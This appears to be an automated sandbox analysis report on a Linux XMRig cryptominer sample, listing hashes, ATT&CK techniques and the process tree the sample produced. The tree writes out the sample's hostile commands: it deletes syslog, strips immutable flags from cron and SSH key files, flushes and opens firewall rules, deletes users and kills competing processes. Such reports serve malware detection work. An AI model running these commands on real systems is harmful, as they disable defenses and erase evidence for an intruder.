xmrig_linux | 3c0e677024ea8554a0eed96c62ef39549cefebb44937d9c778926daac67d5495

Analysis

max time kernel
149s
max time network
143s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
27-09-2024 13:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fa8008ca091d7d984279655e9bc577d8_JaffaCakes118
Size

30KB
MD5

fa8008ca091d7d984279655e9bc577d8
SHA1

2cb21f9e3473a1fb6e3718b2018d6eea5f6f5020
SHA256

3c0e677024ea8554a0eed96c62ef39549cefebb44937d9c778926daac67d5495
SHA512

138f3847581ed8730764453da36c9555dd669e0bf5efc0c6f2433d443afeb4419cd6f190d97417dfa47a8cde3ab145e75664e96b16aad991ab5f10bf8204d9db
SSDEEP

384:p7pQBDf6jlpTWg3vMGQiirhHwMyGj4CC9vEKMvU/4Qdre21jT58vKpG2Y0orcfKS:p78zQ5VFNcDAFLcIwgnoYq0xFBVZHttn

Score

10^/10

xmrig_linux defense_evasion discovery evasion miner privilege_escalation rootkit

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

File and Directory Permissions Modification 1 TTPs 3 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

pid	Process
3126
3130
3135

Deletes system logs 1 TTPs 1 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Clear Linux or Mac System Logs

T1070.002

Processes:

description	ioc	Process
File deleted	/var/log/syslog	rm

Flushes firewall rules 1 TTPs 3 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

defense_evasion

Disable or Modify System Firewall

T1562.004

Processes:

ufwiptables

pid	Process
1532	ufw
1707	iptables
3075

Loads a kernel module 1 IoCs

Loads a Linux kernel module, potentially to achieve persistence

rootkit

Processes:

modprobe

ioc	pid	Process
/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko	1536	modprobe

Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

Abuse sudo or cached sudo credentials to execute code.

privilege_escalation defense_evasion

Sudo and Sudo Caching

T1548.003

Processes:

sudo

pid	Process
1708	sudo

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

xargsxargsxargsxargschattrxargsxargsip6tableschattrxargsxargsxargsxargsxargsxargsiptablesxargsxargsxargsiptablesiptablesip6tablesip6tableschattrxargsxargsxargsxargsxargsiptablesiptablesip6tablesgrepxargsxargsiptablesxargsxargsxargsxargsip6tablesxargsxargsxargsxargsxargsxargsxargsip6tablesip6tablesxargsxargs

pid	Process
1913	xargs
2119	xargs
2382	xargs
2511	xargs
1529	chattr
2227	xargs
2459	xargs
2909
1666	ip6tables
1721	chattr
2034	xargs
2143	xargs
2202	xargs
2318	xargs
2616
2531	xargs
2536	xargs
1556	iptables
1928	xargs
1959	xargs
2232	xargs
1554	iptables
1588	iptables
1669	ip6tables
1701	ip6tables
1528	chattr
1828	xargs
2019	xargs
2612
1840	xargs
1848	xargs
2165	xargs
2716
3012
1568	iptables
1589	iptables
1681	ip6tables
1728	grep
1944	xargs
2551	xargs
1557	iptables
2138	xargs
2577
2303	xargs
2601
1893	xargs
2197	xargs
2676
2680
2720
1665	ip6tables
1792	xargs
1865	xargs
1989	xargs
1898	xargs
2049	xargs
2059	xargs
2654
3000
2471	xargs
1634	ip6tables
1649	ip6tables
1923	xargs
1938	xargs

Disables AppArmor 28 IoCs

Disables AppArmor security module.

Processes:

pid	Process
3054
3054
3074
3079
3085
3074
3074
3099
3085
3085
3067
3079
3054
3054
3074
3085
3085
3054
3079
3079
3091
3074
3079
3085
3054
3074
3079
3089

Disables SELinux 1 TTPs 1 IoCs

Disables SELinux security module.

defense_evasion

Disable or Modify Tools

T1562.001

Processes:

pid	Process
3053

Enumerates running processes
Discovers information about currently running processes on the system

Changes its process name 1 IoCs

Processes:

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	3071

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

Processes:

pspspspkillpspspspspspspspspskillpspspspspspspspspspspspspspspspspspspsps

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

Processes:

modprobe

description	ioc	Process
File opened for reading	/sys/module/ip6_tables/initstate	modprobe
File opened for reading	/sys/module/x_tables/initstate	modprobe

Process Discovery 1 TTPs 64 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

Processes:

pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspsps

pid	Process
2344	ps
1849	ps
2045	ps
2258	ps
2472	ps
2482	ps
1844	ps
1975	ps
2166	ps
2040	ps
2144	ps
2223	ps
1970	ps
1980	ps
2035	ps
2208	ps
2238	ps
2365	ps
2395	ps
1899	ps
2110	ps
2134	ps
1945	ps
2383	ps
2454	ps
2183	ps
2477	ps
1914	ps
2442	ps
2466	ps
2412	ps
1929	ps
2203	ps
2377	ps
2139	ps
2161	ps
2243	ps
1909	ps
2070	ps
2095	ps
2248	ps
2304	ps
2389	ps
1995	ps
2065	ps
2100	ps
2286	ps
2314	ps
2154	ps
2418	ps
1725	ps
2005	ps
2085	ps
3103
2309	ps
2460	ps
2487	ps
2090	ps
2218	ps
2000	ps
2020	ps
2060	ps
2213	ps
1950	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspsps

description	ioc	Process
File opened for reading	/proc/1199/status	ps
File opened for reading	/proc/2259/status	ps
File opened for reading	/proc/10/stat	ps
File opened for reading	/proc/1042/status	ps
File opened for reading	/proc/84/status
File opened for reading	/proc/978/status	ps
File opened for reading	/proc/1350/cmdline	ps
File opened for reading	/proc/1/stat	ps
File opened for reading	/proc/173/status	ps
File opened for reading	/proc/162/status	ps
File opened for reading	/proc/1042/stat	ps
File opened for reading	/proc/30/status
File opened for reading	/proc/1129/status	ps
File opened for reading	/proc/1152/cmdline	ps
File opened for reading	/proc/203/cmdline
File opened for reading	/proc/1157/cmdline
File opened for reading	/proc/1350/stat	ps
File opened for reading	/proc/14/stat	ps
File opened for reading	/proc/1211/cmdline	ps
File opened for reading	/proc/621/cmdline
File opened for reading	/proc/311/cmdline
File opened for reading	/proc/972/cmdline
File opened for reading	/proc/317/cmdline	ps
File opened for reading	/proc/8/stat	ps
File opened for reading	/proc/10/status	ps
File opened for reading	/proc/1140/status	ps
File opened for reading	/proc/171/status
File opened for reading	/proc/1207/status
File opened for reading	/proc/1520/status
File opened for reading	/proc/173/cmdline	ps
File opened for reading	/proc/978/status	ps
File opened for reading	/proc/1203/status
File opened for reading	/proc/486/cmdline	ps
File opened for reading	/proc/168/cmdline
File opened for reading	/proc/1136/cmdline
File opened for reading	/proc/1140/cmdline
File opened for reading	/proc/20/status
File opened for reading	/proc/414/stat	ps
File opened for reading	/proc/486/status	ps
File opened for reading	/proc/36/cmdline
File opened for reading	/proc/158/cmdline
File opened for reading	/proc/1202/cmdline
File opened for reading	/proc/6/status
File opened for reading	/proc/1526/stat	ps
File opened for reading	/proc/268/status	ps
File opened for reading	/proc/115/cmdline
File opened for reading	/proc/85/cmdline
File opened for reading	/proc/6/cmdline
File opened for reading	/proc/177/status
File opened for reading	/proc/1004/cmdline	ps
File opened for reading	/proc/24/stat	ps
File opened for reading	/proc/414/cmdline
File opened for reading	/proc/13/cmdline	ps
File opened for reading	/proc/27/stat	ps
File opened for reading	/proc/15/cmdline
File opened for reading	/proc/1309/cmdline
File opened for reading	/proc/461/status
File opened for reading	/proc/3/status
File opened for reading	/proc/1246/stat	ps
File opened for reading	/proc/1526/stat
File opened for reading	/proc/965/cmdline	ps
File opened for reading	/proc/12/status
File opened for reading	/proc/452/cmdline
File opened for reading	/proc/3114/cmdline

System Network Configuration Discovery 1 TTPs 5 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

modprobegrepgrepgrep

pid	Process
1536	modprobe
2087	grep
2117	grep
2331	grep
2871

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

Processes:

fa8008ca091d7d984279655e9bc577d8_JaffaCakes118

description	ioc	Process
File opened for modification	/tmp/log_rot	fa8008ca091d7d984279655e9bc577d8_JaffaCakes118

/tmp/fa8008ca091d7d984279655e9bc577d8_JaffaCakes118
/tmp/fa8008ca091d7d984279655e9bc577d8_JaffaCakes118
1⤵
- Writes file to tmp directory
PID:1526
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:1527
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  - Attempts to change immutable files
  PID:1528
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  - Attempts to change immutable files
  PID:1529
- /usr/bin/chattr
  chattr -R -i /var/spool/cron
  2⤵
  PID:1530
- /usr/bin/chattr
  chattr -i /etc/crontab
  2⤵
  PID:1531
- /usr/sbin/ufw
  ufw disable
  2⤵
  - Flushes firewall rules
  PID:1532
- - /sbin/iptables
    /sbin/iptables -V
    3⤵
    PID:1533
- - /lib/ufw/ufw-init
    /lib/ufw/ufw-init force-stop
    3⤵
    PID:1534
  - - /sbin/ip6tables
      ip6tables -L INPUT -n
      4⤵
      PID:1535
    - - /sbin/modprobe
        
        /sbin/modprobe ip6_tables
        5⤵
        Loads a kernel module
        Enumerates kernel/hardware configuration
        System Network Configuration Discovery
        
        PID:1536
  - - /sbin/iptables
      iptables -F ufw-logging-deny
      4⤵
      PID:1543
  - - /sbin/iptables
      iptables -F ufw-logging-allow
      4⤵
      PID:1546
  - - /sbin/iptables
      iptables -F ufw-not-local
      4⤵
      PID:1547
  - - /sbin/iptables
      iptables -F ufw-user-logging-input
      4⤵
      PID:1548
  - - /sbin/iptables
      iptables -F ufw-user-limit-accept
      4⤵
      PID:1549
  - - /sbin/iptables
      iptables -F ufw-user-limit
      4⤵
      PID:1550
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-input
      4⤵
      PID:1551
  - - /sbin/iptables
      iptables -F ufw-reject-input
      4⤵
      PID:1552
  - - /sbin/iptables
      iptables -F ufw-after-logging-input
      4⤵
      PID:1553
  - - /sbin/iptables
      iptables -F ufw-after-input
      4⤵
      Attempts to change immutable files
      PID:1554
  - - /sbin/iptables
      iptables -F ufw-user-input
      4⤵
      PID:1555
  - - /sbin/iptables
      iptables -F ufw-before-input
      4⤵
      Attempts to change immutable files
      PID:1556
  - - /sbin/iptables
      iptables -F ufw-before-logging-input
      4⤵
      Attempts to change immutable files
      PID:1557
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-forward
      4⤵
      PID:1558
  - - /sbin/iptables
      iptables -F ufw-reject-forward
      4⤵
      PID:1559
  - - /sbin/iptables
      iptables -F ufw-after-logging-forward
      4⤵
      PID:1560
  - - /sbin/iptables
      iptables -F ufw-after-forward
      4⤵
      PID:1561
  - - /sbin/iptables
      iptables -F ufw-user-logging-forward
      4⤵
      PID:1562
  - - /sbin/iptables
      iptables -F ufw-user-forward
      4⤵
      PID:1563
  - - /sbin/iptables
      iptables -F ufw-before-forward
      4⤵
      PID:1564
  - - /sbin/iptables
      iptables -F ufw-before-logging-forward
      4⤵
      PID:1565
  - - /sbin/iptables
      iptables -F ufw-track-forward
      4⤵
      PID:1566
  - - /sbin/iptables
      iptables -F ufw-track-output
      4⤵
      PID:1567
  - - /sbin/iptables
      iptables -F ufw-track-input
      4⤵
      Attempts to change immutable files
      PID:1568
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-output
      4⤵
      PID:1569
  - - /sbin/iptables
      iptables -F ufw-reject-output
      4⤵
      PID:1570
  - - /sbin/iptables
      iptables -F ufw-after-logging-output
      4⤵
      PID:1571
  - - /sbin/iptables
      iptables -F ufw-after-output
      4⤵
      PID:1572
  - - /sbin/iptables
      iptables -F ufw-user-logging-output
      4⤵
      PID:1573
  - - /sbin/iptables
      iptables -F ufw-user-output
      4⤵
      PID:1574
  - - /sbin/iptables
      iptables -F ufw-before-output
      4⤵
      PID:1575
  - - /sbin/iptables
      iptables -F ufw-before-logging-output
      4⤵
      PID:1576
  - - /sbin/iptables
      iptables -Z ufw-logging-deny
      4⤵
      PID:1577
  - - /sbin/iptables
      iptables -Z ufw-logging-allow
      4⤵
      PID:1578
  - - /sbin/iptables
      iptables -Z ufw-not-local
      4⤵
      PID:1579
  - - /sbin/iptables
      iptables -Z ufw-user-logging-input
      4⤵
      PID:1580
  - - /sbin/iptables
      iptables -Z ufw-user-limit-accept
      4⤵
      PID:1581
  - - /sbin/iptables
      iptables -Z ufw-user-limit
      4⤵
      PID:1582
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-input
      4⤵
      PID:1583
  - - /sbin/iptables
      iptables -Z ufw-reject-input
      4⤵
      PID:1584
  - - /sbin/iptables
      iptables -Z ufw-after-logging-input
      4⤵
      PID:1585
  - - /sbin/iptables
      iptables -Z ufw-after-input
      4⤵
      PID:1586
  - - /sbin/iptables
      iptables -Z ufw-user-input
      4⤵
      PID:1587
  - - /sbin/iptables
      iptables -Z ufw-before-input
      4⤵
      Attempts to change immutable files
      PID:1588
  - - /sbin/iptables
      iptables -Z ufw-before-logging-input
      4⤵
      Attempts to change immutable files
      PID:1589
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-forward
      4⤵
      PID:1590
  - - /sbin/iptables
      iptables -Z ufw-reject-forward
      4⤵
      PID:1591
  - - /sbin/iptables
      iptables -Z ufw-after-logging-forward
      4⤵
      PID:1592
  - - /sbin/iptables
      iptables -Z ufw-after-forward
      4⤵
      PID:1593
  - - /sbin/iptables
      iptables -Z ufw-user-logging-forward
      4⤵
      PID:1594
  - - /sbin/iptables
      iptables -Z ufw-user-forward
      4⤵
      PID:1595
  - - /sbin/iptables
      iptables -Z ufw-before-forward
      4⤵
      PID:1596
  - - /sbin/iptables
      iptables -Z ufw-before-logging-forward
      4⤵
      PID:1597
  - - /sbin/iptables
      iptables -Z ufw-track-forward
      4⤵
      PID:1598
  - - /sbin/iptables
      iptables -Z ufw-track-output
      4⤵
      PID:1599
  - - /sbin/iptables
      iptables -Z ufw-track-input
      4⤵
      PID:1600
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-output
      4⤵
      PID:1601
  - - /sbin/iptables
      iptables -Z ufw-reject-output
      4⤵
      PID:1602
  - - /sbin/iptables
      iptables -Z ufw-after-logging-output
      4⤵
      PID:1603
  - - /sbin/iptables
      iptables -Z ufw-after-output
      4⤵
      PID:1604
  - - /sbin/iptables
      iptables -Z ufw-user-logging-output
      4⤵
      PID:1605
  - - /sbin/iptables
      iptables -Z ufw-user-output
      4⤵
      PID:1606
  - - /sbin/iptables
      iptables -Z ufw-before-output
      4⤵
      PID:1607
  - - /sbin/iptables
      iptables -Z ufw-before-logging-output
      4⤵
      PID:1608
  - - /sbin/iptables
      iptables -X ufw-logging-deny
      4⤵
      PID:1609
  - - /sbin/iptables
      iptables -X ufw-logging-allow
      4⤵
      PID:1610
  - - /sbin/iptables
      iptables -X ufw-not-local
      4⤵
      PID:1611
  - - /sbin/iptables
      iptables -X ufw-user-logging-input
      4⤵
      PID:1612
  - - /sbin/iptables
      iptables -X ufw-user-logging-output
      4⤵
      PID:1613
  - - /sbin/iptables
      iptables -X ufw-user-logging-forward
      4⤵
      PID:1614
  - - /sbin/iptables
      iptables -X ufw-user-limit-accept
      4⤵
      PID:1615
  - - /sbin/iptables
      iptables -X ufw-user-limit
      4⤵
      PID:1616
  - - /sbin/iptables
      iptables -X ufw-user-input
      4⤵
      PID:1617
  - - /sbin/iptables
      iptables -X ufw-user-forward
      4⤵
      PID:1618
  - - /sbin/iptables
      iptables -X ufw-user-output
      4⤵
      PID:1619
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-input
      4⤵
      PID:1620
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-output
      4⤵
      PID:1621
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-forward
      4⤵
      PID:1622
  - - /sbin/iptables
      iptables -P INPUT ACCEPT
      4⤵
      PID:1623
  - - /sbin/iptables
      iptables -P OUTPUT ACCEPT
      4⤵
      PID:1624
  - - /sbin/iptables
      iptables -P FORWARD ACCEPT
      4⤵
      PID:1625
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-deny
      4⤵
      PID:1626
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-allow
      4⤵
      PID:1627
  - - /sbin/ip6tables
      ip6tables -F ufw6-not-local
      4⤵
      PID:1628
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-input
      4⤵
      PID:1629
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit-accept
      4⤵
      PID:1630
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit
      4⤵
      PID:1631
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-input
      4⤵
      PID:1632
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-input
      4⤵
      PID:1633
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-input
      4⤵
      Attempts to change immutable files
      PID:1634
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-input
      4⤵
      PID:1635
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-input
      4⤵
      PID:1636
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-input
      4⤵
      PID:1637
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-input
      4⤵
      PID:1638
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-forward
      4⤵
      PID:1639
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-forward
      4⤵
      PID:1640
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-forward
      4⤵
      PID:1641
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-forward
      4⤵
      PID:1642
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-forward
      4⤵
      PID:1643
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-forward
      4⤵
      PID:1644
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-forward
      4⤵
      PID:1645
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-forward
      4⤵
      PID:1646
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-forward
      4⤵
      PID:1647
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-output
      4⤵
      PID:1648
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-input
      4⤵
      Attempts to change immutable files
      PID:1649
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-output
      4⤵
      PID:1650
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-output
      4⤵
      PID:1651
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-output
      4⤵
      PID:1652
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-output
      4⤵
      PID:1653
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-output
      4⤵
      PID:1654
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-output
      4⤵
      PID:1655
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-output
      4⤵
      PID:1656
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-output
      4⤵
      PID:1657
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-deny
      4⤵
      PID:1658
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-allow
      4⤵
      PID:1659
  - - /sbin/ip6tables
      ip6tables -Z ufw6-not-local
      4⤵
      PID:1660
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-input
      4⤵
      PID:1661
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit-accept
      4⤵
      PID:1662
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit
      4⤵
      PID:1663
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-input
      4⤵
      PID:1664
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-input
      4⤵
      Attempts to change immutable files
      PID:1665
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-input
      4⤵
      Attempts to change immutable files
      PID:1666
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-input
      4⤵
      PID:1667
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-input
      4⤵
      PID:1668
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-input
      4⤵
      Attempts to change immutable files
      PID:1669
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-input
      4⤵
      PID:1670
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-forward
      4⤵
      PID:1671
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-forward
      4⤵
      PID:1672
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-forward
      4⤵
      PID:1673
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-forward
      4⤵
      PID:1674
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-forward
      4⤵
      PID:1675
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-forward
      4⤵
      PID:1676
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-forward
      4⤵
      PID:1677
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-forward
      4⤵
      PID:1678
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-forward
      4⤵
      PID:1679
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-output
      4⤵
      PID:1680
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-input
      4⤵
      Attempts to change immutable files
      PID:1681
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-output
      4⤵
      PID:1682
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-output
      4⤵
      PID:1683
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-output
      4⤵
      PID:1684
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-output
      4⤵
      PID:1685
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-output
      4⤵
      PID:1686
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-output
      4⤵
      PID:1687
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-output
      4⤵
      PID:1688
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-output
      4⤵
      PID:1689
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-deny
      4⤵
      PID:1690
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-allow
      4⤵
      PID:1691
  - - /sbin/ip6tables
      ip6tables -X ufw6-not-local
      4⤵
      PID:1692
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-input
      4⤵
      PID:1693
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-output
      4⤵
      PID:1694
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-forward
      4⤵
      PID:1695
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit-accept
      4⤵
      PID:1696
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit
      4⤵
      PID:1697
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-input
      4⤵
      PID:1698
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-forward
      4⤵
      PID:1699
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-output
      4⤵
      PID:1700
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-input
      4⤵
      Attempts to change immutable files
      PID:1701
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-output
      4⤵
      PID:1702
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-forward
      4⤵
      PID:1703
  - - /sbin/ip6tables
      ip6tables -P INPUT ACCEPT
      4⤵
      PID:1704
  - - /sbin/ip6tables
      ip6tables -P OUTPUT ACCEPT
      4⤵
      PID:1705
  - - /sbin/ip6tables
      ip6tables -P FORWARD ACCEPT
      4⤵
      PID:1706
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:1707
- /usr/bin/sudo
  sudo sysctl "kernel.nmi_watchdog=0"
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  PID:1708
- /usr/sbin/userdel
  userdel akay
  2⤵
  PID:1712
- /usr/sbin/userdel
  userdel vfinder
  2⤵
  PID:1713
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  PID:1720
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  - Attempts to change immutable files
  PID:1721
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:1722
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:1723
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:1724
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  PID:1726
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1725
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  - Attempts to change immutable files
  PID:1728
- /bin/ps
  ps aux
  2⤵
  PID:1727
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1733
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1732
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1731
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:1730
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1738
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1737
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1736
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:1735
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1744
- /bin/grep
  grep -v -
  2⤵
  PID:1743
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1742
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1741
- /bin/grep
  grep :143
  2⤵
  PID:1740
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1750
- /bin/grep
  grep -v -
  2⤵
  PID:1749
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1748
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1747
- /bin/grep
  grep :2222
